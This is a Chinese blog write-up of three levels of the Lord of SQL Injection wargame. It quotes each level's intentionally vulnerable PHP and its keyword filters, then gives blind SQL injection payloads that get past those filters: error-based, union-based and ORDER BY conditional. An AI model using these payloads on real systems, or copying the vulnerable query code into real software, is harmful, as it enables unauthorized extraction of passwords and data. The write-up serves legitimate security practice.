Lord-of-SQLInjection-Write-Up(三)

iron_golem

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit(mysqli_error($db));
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("iron_golem");
  highlight_file(__FILE__);

过滤了延时函数,本来想用基于正则的延时注入,但是过滤了点号(正则中任意匹配的通
配符)

exit(mysqli_error($db));

程序会进行报错回显,考虑常见的报错回显如updatexml(),但是表名被过滤,无法利用
最后使用盲注,在true时因执行(select 1 union select 2)语句而报错

在这里插入图片描述在false时返回空,基于此实现盲注脚本

payload

?pw=1' or id='admin' and if(ascii(substr((pw),1,1))&gt;80,(select 1 union select 2),1)%23

dark_eyes

  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(mysqli_error($db)) exit();
  echo "<hr>query : <strong>{$query}</strong><hr><br>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
  highlight_file(__FILE__);

原本使用这个payload

https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php?pw=1' or id='admin' and substr(pw,1,1)='a' and (select 1 union select 2)%23

但是选择表名后一直显示空白,无法进行盲注

后来看别人的writeup,发现另一种姿势

select 1 union select 0报错
select 1 union select 1不报错

基于此可以构造盲注

paylaod

?pw=1' or id='admin' and (select 1 union select ascii(substr((pw),1,1))&gt;80)%23

hell_fire

  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border="1"><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) &amp;&amp; ($result['email'] === $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);

利用order by进行盲注
根据if语句true or false返回不同的字段进行排序,确保两个字段排序的结果不同(socre,id,email三个字段排序返回的结果都是一样的,所以选择纯数字字段)

payload

?order=if(id='admin' and ascii(substr(email,1,1))=97,score,9999)

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据